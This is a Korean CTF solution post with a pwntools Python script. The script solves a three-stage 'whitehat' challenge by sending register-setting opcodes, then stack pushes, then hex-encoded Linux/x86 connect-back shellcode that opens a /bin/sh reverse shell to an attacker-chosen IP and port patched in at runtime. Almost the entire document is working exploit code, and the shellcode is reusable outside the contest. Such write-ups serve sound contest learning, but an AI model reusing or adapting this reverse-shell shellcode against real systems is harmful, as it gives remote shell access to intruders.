whitehat CTF 문제
급하게 짜느라고 소스는 엉망이지만, 나중을 위해 기록^^ (서버가 요구하는 opcode를 세 단계 — 레지스터 값 설정 → 세 값 push → 서버가 알려준 ip:port로 연결하는 리버스 셸 쉘코드 — 로 16진수 문자열로 보내는 스크립트다.)
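from __future__ import print_function

import binascii
import re
import socket
import struct
from subprocess import check_output  # unused in this script; kept from the original listing

from pwn import *  # remote(), asm() -- default pwntools context (i386), as in the original

# Challenge endpoint taken from the original writeup (contest infrastructure).
HOST = "121.78.147.159"
PORT = 55511

# Prompt the server prints when it is ready for the next opcode string.
PROMPT = "input Opcode"

# Order in which the server lists the registers; the parser maps values
# onto names positionally, exactly as the original did.
REGISTERS = ("eax", "ebx", "ecx", "edx", "esp", "ebp", "esi", "edi")

# Fallbacks used for any register the banner does not yield (from the original).
DEFAULT_REGISTERS = {
    "eax": 0xeb172f5b, "ebx": 0x5be4d5fa, "ecx": 0x8aabb74e, "edx": 0xca568210,
    "esp": 0xb0a6bd97, "ebp": 0x2044ada2, "esi": 0xefc7fe7a, "edi": 0x6f9d6a62,
}

# Linux/x86 connect-back shellcode, hex-encoded, split around the two fields
# patched at runtime: the 4-byte IPv4 address after `push imm32` (0x68) and
# the 2-byte port after `push imm16` (0x66 0x68). Bytes are identical to the
# original; only the IP/port are filled in.
SHELLCODE_HEAD = "6a66589952425289d3425289e1cd809389d1b03fcd804979f9b06687da68"
SHELLCODE_PORT_PUSH = "6668"
SHELLCODE_TAIL = "66534389e16a10515289e1cd806a0b589989d152682f2f7368682f62696e89e3cd80"

HEX_WORD = re.compile(r"0x[0-9a-fA-F]+")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def hexstr(data):
    """Return *data* (a byte string) as a lowercase hex string."""
    return binascii.hexlify(data)


def parse_registers(banner):
    """Map the register dump in *banner* onto REGISTERS, by position.

    The original matched ``.{3} = 0x.{0,8}`` and assigned the i-th hit to the
    i-th register; this keeps that positional mapping but only accepts hex
    digits, so a stray character cannot reach int(). Registers that are not
    found keep their DEFAULT_REGISTERS value.
    """
    regs = dict(DEFAULT_REGISTERS)
    found = re.findall(r".{3} = (0x[0-9a-fA-F]{1,8})", banner)
    for name, value in zip(REGISTERS, found):
        regs[name] = int(value, 16)
    return regs


def register_payload(regs):
    """Hex-encode ``mov reg, imm32`` for every register, in REGISTERS order."""
    code = "".join(hexstr(asm("mov %s, 0x%x" % (name, regs[name])))
                   for name in REGISTERS)
    # Two newlines terminate an opcode string for the server (as in the original).
    return code + "\n\n"


def parse_push_values(text):
    """Return the first three ``0x…`` words in *text* as ints, in listed order.

    Raises ValueError when fewer than three are present (the original's
    fixed-offset slicing would have failed in int() at that point).
    """
    words = HEX_WORD.findall(text)
    if len(words) < 3:
        raise ValueError("expected three 0x values in: %r" % text)
    return [int(word, 16) for word in words[:3]]


def push_payload(values):
    """Hex-encode ``add esp, 0xc`` followed by pushes of *values* in reverse.

    The original's note reads ``sub = esp, 0xc``, so the add presumably undoes a
    ``sub esp, 0xc`` the server performed. Pushing in reverse leaves the first
    listed value on top of the stack, matching the original push order.
    """
    code = hexstr(asm("add esp, 0xc"))
    for value in reversed(values):
        code += hexstr(asm("push 0x%x" % value))
    return code + "\n\n"


def parse_connect_back(text):
    """Extract the (ip, port) the challenge wants the shell to connect to.

    Assumed layout, inferred from the original's fixed-width slicing after each
    ``:``: ``...: <ipv4> ...: <port> ...: /bin/sh``. The IPv4 literal is located
    by pattern and the port is the first digit run after it, so field widths no
    longer matter. Raises ValueError when either is missing or the port is out
    of range; socket.inet_aton in the caller rejects a malformed address.
    """
    ip_match = IPV4.search(text)
    if ip_match is None:
        raise ValueError("no IPv4 address in: %r" % text)
    port_match = re.search(r"\d{1,5}", text[ip_match.end():])
    if port_match is None:
        raise ValueError("no port after address in: %r" % text)
    port = int(port_match.group(0))
    if not 0 < port < 65536:
        raise ValueError("port out of range: %d" % port)
    return ip_match.group(0), port


def reverse_shell_payload(ip, port):
    """Hex-encoded connect-back shellcode with *ip*:*port* patched in.

    sockaddr_in wants both fields in network byte order. inet_aton already
    returns that, and struct ``>H`` gives it for the port; the original
    reached the same bytes via htons() plus hex-string reshuffling, which only
    came out right on a little-endian host.
    """
    ip_hex = hexstr(socket.inet_aton(ip))
    port_hex = hexstr(struct.pack(">H", port))
    return (SHELLCODE_HEAD + ip_hex + SHELLCODE_PORT_PUSH + port_hex
            + SHELLCODE_TAIL + "\n\n")


def drain(conn):
    """Print everything the server sends until it closes the connection.

    Only EOFError (pwntools: remote end closed) ends the loop quietly; the
    original's bare ``except`` also hid KeyboardInterrupt and real bugs.
    """
    while True:
        try:
            data = conn.recv()
        except EOFError:
            break
        if not data:
            break
        print(data)


def main():
    """Run the three stages against the challenge server."""
    conn = remote(HOST, PORT)
    try:
        # Stage 1: set every register to the value the banner asks for.
        banner = conn.recvuntil(PROMPT)
        print(banner)
        payload = register_payload(parse_registers(banner))
        print(payload)
        conn.send(payload)

        # The original consumed one reply here before waiting for the next
        # prompt; kept as-is so the stage-2 text is parsed from the same chunk.
        conn.recv()

        # Stage 2: three values the server lists must end up on the stack.
        text = conn.recvuntil(PROMPT)
        print(text)
        print("----")
        values = parse_push_values(text)
        for label, value in zip(("push 3", "push 2", "push 1"), values):
            print("%s = 0x%x" % (label, value))
        payload = push_payload(values)
        print(payload)
        conn.send(payload)

        # Stage 3: connect-back shell to the address the server names.
        # "/bin/sh" is only used as the delimiter of this message.
        text = conn.recvuntil("/bin/sh")
        print("----")
        print(text)
        ip, port = parse_connect_back(text)
        print("ip address = %s" % ip)
        print("port = %d" % port)
        payload = reverse_shell_payload(ip, port)
        print(payload)
        conn.send(payload)
        drain(conn)
    finally:
        conn.close()
    print("done!")


if __name__ == "__main__":
    main()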